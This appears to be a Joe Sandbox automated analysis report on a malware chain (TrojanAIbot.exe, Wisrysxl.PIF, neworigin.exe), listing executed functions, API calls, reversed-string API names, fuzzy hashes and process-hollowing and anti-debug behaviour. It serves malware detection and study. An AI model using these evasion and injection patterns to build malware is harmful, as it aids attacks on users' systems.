Source File: 00000012.00000002.4508684769.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_105d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf85f7938302afda9316fa9d9c73bcffa46d77f55db6c2df14ad862b2fcd004
Instruction ID: 501eb2ce9619014957e3a354fd5613a9906a8c2ccb4fc66dcc7f754690bc0ca8
Opcode Fuzzy Hash: 3cf85f7938302afda9316fa9d9c73bcffa46d77f55db6c2df14ad862b2fcd004
Instruction Fuzzy Hash: 3CF0C271004344AAE7608A1ACC84B63FFECEF41674F18C85AFD884A286C2799841CB70

Analysis Process: TrojanAIbot.exePID: 7184, Parent PID: 1068COMMON

Executed Functions

Function 01450839 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2384395543.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1450000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad047932d01179b0215c921d2b3e0a6d38386e9207545fd585698a11ceac73b
Instruction ID: 282298ba45baa743ee37d5a3e14259d8abcfdd71cb281d7cc3fc388ec4b69a31
Opcode Fuzzy Hash: fad047932d01179b0215c921d2b3e0a6d38386e9207545fd585698a11ceac73b
Instruction Fuzzy Hash: A962CE70A01229CFDB69DF64D894B9DBBB2BF48704F1085E9D40AA7364DB30AE85CF45

Function 01450848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2384395543.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1450000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fb2754956f092149c300775f775914242ef73e09845fc67bc611fe2c99f4da
Instruction ID: f4db5c93f7d67cc531c94b0e7e868771209416acf81b0109a18b0b07f950c42a
Opcode Fuzzy Hash: b5fb2754956f092149c300775f775914242ef73e09845fc67bc611fe2c99f4da
Instruction Fuzzy Hash: CF62BE70A01229CFDB69DF64D894B9DBBB2BF48704F1085E9D40AA7364DB30AE85CF45

Function 01455228 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2384395543.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1450000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0debb38915b7416047fb022e51ffb9f512c919347a6c60088918ced7549ce3
Instruction ID: fc9ac9266884230a918ec121edf01ffbcdc8111bcfe392d71a93d6a9e273a0f9
Opcode Fuzzy Hash: db0debb38915b7416047fb022e51ffb9f512c919347a6c60088918ced7549ce3
Instruction Fuzzy Hash: 8C118E74C153099FDB40EFB4D0193AE7FB0EB06301F0458AAA416A72A2D7784648CF55

Function 01455238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2384395543.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1450000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57ed33c124c9194b838e01431072314f62799643cd86bb0f13f72450a11dbc8
Instruction ID: 32cbe48a0e463ffeca291015047edfefd0a597f390533c10005e1d0e45e4e738
Opcode Fuzzy Hash: e57ed33c124c9194b838e01431072314f62799643cd86bb0f13f72450a11dbc8
Instruction Fuzzy Hash: 41015E70C01209DFDB44EFB8D00D7AEBFB0EB05301F0098AA9415A7291DB780644CF55

Analysis Process: Wisrysxl.PIFPID: 7428, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1349
Total number of Limit Nodes:	12

Executed Functions

Function 02CB7AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F

Strings

ntdll, xrefs: 02CB7A74
yromeMlautriVetacollAwZ, xrefs: 02CB7A47

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 2167126740-445027087
Opcode ID: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
Instruction ID: 487dd44f69d4b8965a7ca238ba70fe97d7265f3d83f42a73ebaa1e1d63dce034
Opcode Fuzzy Hash: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
Instruction Fuzzy Hash: BE117076680208BFEB25EFA4DC61EEAB7EDEF89700F415460BD01D7240D670AE08DB24

Function 02CB7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F

Strings

ntdll, xrefs: 02CB7A74
yromeMlautriVetacollAwZ, xrefs: 02CB7A47

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
Instruction ID: d35e43cdf6519915d983e7f9901a29b4ce7696426111a01c7dc7277a1d43c370
Opcode Fuzzy Hash: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
Instruction Fuzzy Hash: 27115B75680209BFEB25EFA4DD61EEEB7AEEF89700F414460B900D7240D670AE14DB20

Function 02CB7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F

Strings

ntdll, xrefs: 02CB7A74
yromeMlautriVetacollAwZ, xrefs: 02CB7A47

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
Instruction ID: 84b77c6e4943d351f108c9773cee7175bc14f13f2108fb4c312efa49b46ba51b
Opcode Fuzzy Hash: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
Instruction Fuzzy Hash: A3116D75680209BFEB25EFA4DD61EDEB7AEEF89700F414460B900D7240D670AE14DB20

Function 02CB8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB8471

Strings

yromeMlautriVdaeRtN, xrefs: 02CB841B
ntdll, xrefs: 02CB8448

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2004920654-737317276
Opcode ID: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
Instruction ID: 9a8718512f8b517b0c54e90fba0b406d5f4d4b6984f2880420b82635de85b9a5
Opcode Fuzzy Hash: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
Instruction Fuzzy Hash: AE016579640208AFEB25EFA8DC61E9AB7EEFB48704F514420F904D7340D674AD10DF24

Function 02CB7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7DEC

Strings

Ntdll, xrefs: 02CB7DC3
yromeMlautriVetirW, xrefs: 02CB7D93

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 4260932595-3542721025
Opcode ID: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
Instruction ID: 78d1a974077c55c2e075d1905afcd4a12206ab91b818e76c7dec468578bff531
Opcode Fuzzy Hash: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
Instruction Fuzzy Hash: 3C012D7A640289AFEB25EF98DC51E9EB7EDEF89700F514460B800D7640D670AD14DB64

Function 02CB8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5

Strings

ntdll, xrefs: 02CB86B8
noitceSfOweiVpamnUtN, xrefs: 02CB868B

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
Instruction ID: 739748ca6199268125a6eadeeb574ff6aabdb07454edfd07f0b6b4aa2a1ffccd
Opcode Fuzzy Hash: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
Instruction Fuzzy Hash: 69016D74A40208AFEB25EFB4DD61E9EB7EEEF89B14F514560B800E7640DA74AD04DA24

Function 02CB86F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5

Strings

ntdll, xrefs: 02CB86B8
noitceSfOweiVpamnUtN, xrefs: 02CB868B

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
Instruction ID: bb059f94d450ff01da575111411e77965e7c9cb6c01599880433dd25e394d74e
Opcode Fuzzy Hash: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
Instruction Fuzzy Hash: A7F04939A40209EFEB15FFB4E9509DDB7EEEF89314F5145A1A44497600DA30AE04DF10

Function 02CB8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8814

Strings

Kernel32, xrefs: 02CB87D3
CreateProcessAsUserW, xrefs: 02CB87A1

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressCreateHandleModuleProcProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 4105707577-2353454454
Opcode ID: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
Instruction ID: b184ac1baf577caab1b03594f22592a6b9b9590eab133f6cef23aa0fa1c8e71e
Opcode Fuzzy Hash: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
Instruction Fuzzy Hash: D711E2B2640248AFEB61EFA8DD91FDA77EDEF0C704F514520BA08E7200C674ED109B25

Function 02CBF744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBF77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02CBF760
KernelBase, xrefs: 02CBF74F

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 3662101638-539270669
Opcode ID: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
Instruction ID: 9068f52313cf04630e4c1d7f48903d5217e9df65c7e1d7e9715cc46603e5a760
Opcode Fuzzy Hash: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
Instruction Fuzzy Hash: 1CF0A77190424CBAEB11A6F98C887DCFBBD5F05329F2443D8B435B2AD1E7710740CA91

Non-executed Functions

Function 02CB8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB83C2), ref: 02CB83A4

Strings

FlushInstructionCache, xrefs: 02CB8351
Kernel32, xrefs: 02CB8383

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressCacheFlushHandleInstructionModuleProc
String ID: FlushInstructionCache$Kernel32
API String ID: 2392256011-184458249
Opcode ID: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
Instruction ID: 067961a0e7cce3a66ec7a916f8cf384186fc55d6909c03e76ea6128a29291d8f
Opcode Fuzzy Hash: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
Instruction Fuzzy Hash: 7D016975784348AFEB26EFA4DC62F9AB7EEEB08B00F514460B904D6740D6B0AD149F25

Function 02CB8274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

Strings

Kernel32, xrefs: 02CB82BC
sserddAcorPteG, xrefs: 02CB828F

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressProc
String ID: Kernel32$sserddAcorPteG
API String ID: 190572456-1372893251
Opcode ID: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
Instruction ID: b64e41fb3fd22123c87680a9d816b1db0dfcf516df3717620b9116deefb36234
Opcode Fuzzy Hash: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
Instruction Fuzzy Hash: 17016D75A40309AFEB25EFA4DC61E9EB7EEEB48B04F514460B805D7740DA70AD04DE68

Function 02CB81CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9

GetModuleHandleA.KERNELBASE(?), ref: 02CB821E

Strings

KernelBASE, xrefs: 02CB8205
AeldnaHeludoMteG, xrefs: 02CB81E5

Memory Dump Source

Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1646373207-1952140341
Opcode ID: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
Instruction ID: 4d2158d97946b4596082ce787f036043b811fad725a13a3497fac4afa0c767b2
Opcode Fuzzy Hash: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
Instruction Fuzzy Hash: F7F09670E44704AFFB26EFB4DD1199AB7EDFB49700B514570B810C3750D670AE14D925

Analysis Process: lxsyrsiW.pifPID: 7528, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	27.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`:vD`:v, xrefs: 00401438, 0040143D
D`:vD`:v, xrefs: 00401411, 00401414

Memory Dump Source

Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`:vD`:v$D`:vD`:v
API String ID: 4108700736-3916433284
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Analysis Process: neworigin.exePID: 7592, Parent PID: 7528COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 06427E78 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0642841F
$]q, xrefs: 06428413

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: bc8e1c16cc797425bdd9681f30360936ae6284475562e31bac8ace950932fee9
Instruction ID: a7920de05da0dde0be610f8525a9328278fb35cd577390272e0dfe9936704ea0
Opcode Fuzzy Hash: bc8e1c16cc797425bdd9681f30360936ae6284475562e31bac8ace950932fee9
Instruction Fuzzy Hash: E302AD30B002268FDB55DF68D890A6EB7F6FF84304F648929E4059B395DB35EC86CB91

Function 06422350 Relevance: 1.1, Instructions: 1060COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee9ad72e42d52c5bfc30b8330384d5a4dec3f57b9d778734d0f0f8bb7966bb2
Instruction ID: 88a66ec65366f1f1ea5b9a19a9e0f7680f05109772b437291a0ce4230ff0bc7f
Opcode Fuzzy Hash: 1ee9ad72e42d52c5bfc30b8330384d5a4dec3f57b9d778734d0f0f8bb7966bb2
